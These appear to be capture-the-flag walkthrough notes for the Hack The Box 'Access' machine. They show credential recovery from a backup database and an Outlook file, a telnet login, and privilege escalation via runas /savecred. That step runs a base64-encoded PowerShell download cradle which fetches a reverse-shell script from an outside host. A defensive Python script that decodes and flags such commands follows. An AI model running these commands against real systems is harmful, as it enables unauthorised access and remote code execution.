Access
- How to read an MS Access DB
- Either install a tool or use one that is already on Kali
- What to do when PowerShell is blocked, StoredCredentials
root@kali:/HTB/Access# ftp
ftp> binary
ftp> get backup.mdb
ftp> get "Access Control.zip"
* The files can also be downloaded with wget as the anonymous FTP user; this is more convenient than connecting with ftp and running get
wget -m ftp://anonymous:anonymous@10.10.10.98
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98
root@kali:/HTB/Access# file backup.mdb
root@kali:/HTB/Access# strings backup.mdb > backup.txt
engineer
access4u@security
root@kali:/HTB/Access# 7z x -paccess4u@security ac.zip
root@kali:/HTB/Access# file 'Access Control.pst'
Access Control.pst: Microsoft Outlook email folder (>=2003)
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
root@kali:/HTB/Access# telnet 10.10.10.98
login: security
password: 4Cc3ssC0ntr0ller
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38
Privilege escalation
JAWS.ps1 Enumeration
> Stored Credential vulnerability
c:\Users\Public\Desktop\ZKAccess.35.lnk
or run the command below in PowerShell
PS> cmdkey /list
User: Access\Administrator
Commands for finding shortcuts
PS> $WScript = New-Object -ComObject Wscript.Shell
PS> $shortcut = Get-ChildItem *.lnk
PS> $shortcut
PS> $WScript.CreateShortcut($shortcut)
Log in as Administrator with a Nishang reverse shell
PS> runas /user:Access\Administrator /savecred <command to run>
PS> runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')"
+TIP: Base64-encode the PowerShell command on Kali before using it
echo -n "command to run on Windows" | iconv --to-code UTF-16LE | base64 -w 0
Kali> echo -n "IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
PS> runas /user:ACCESS\Administrator /savecred "powershell -EncodedCommand <base64>"
Typically "runas /savecred" is used to create a shortcut, which the user clicks to run the desired
application. The commands below enumerate all the accessible shortcut (.lnk) files on
the system and examine them for the presence of the "runas" command:
> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt
> ForEach ( $file in gc .\shortcuts.txt) { Write-Output $file ; gc $file | Select-String runas }
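Added example (not part of the original post): a defender-side triage of process-creation command lines that flags "runas /savecred" and reverses the UTF-16LE + base64 encoding from the tip above, so the real command behind -EncodedCommand is visible. The function names, the sample command lines and the path C:\Apps\example.exe are constructed for illustration.

```python
import base64
import re

# Matches "-flag value" pairs; PowerShell accepts any prefix of -EncodedCommand, plus -ec.
FLAG_RE = re.compile(r'[-/](\w+)\s+["\']?([A-Za-z0-9+/=]{8,})')
SAVECRED_RE = re.compile(r'\brunas(?:\.exe)?\b.*?/savecred\b', re.I)
CRADLE_RE = re.compile(r'\biex\b|invoke-expression|downloadstring', re.I)


def encode_like_tip(command):
    """Same transform as the iconv | base64 tip: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    for flag, blob in FLAG_RE.findall(cmdline):
        flag = flag.lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or bad UTF-16
                return None
    return None


def triage(cmdline):
    """Findings for one process-creation command line."""
    decoded = decode_encoded_command(cmdline)
    return {
        "savecred": bool(SAVECRED_RE.search(cmdline)),
        "decoded": decoded,
        "download_cradle": bool(CRADLE_RE.search(decoded or cmdline)),
    }


# Constructed sample command lines (not real logs); the first reuses the page's command.
PAGE_COMMAND = "IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')"
SAMPLE_CMDLINES = [
    r'runas /user:ACCESS\Administrator /savecred "powershell -EncodedCommand %s"'
    % encode_like_tip(PAGE_COMMAND),
    r'runas /user:ACCESS\Administrator /savecred "C:\Apps\example.exe"',
    r'powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line))
```

Any hit on "savecred" is worth reviewing together with the "cmdkey /list" output on that host, since the stored credential is what lets the command run without a password prompt.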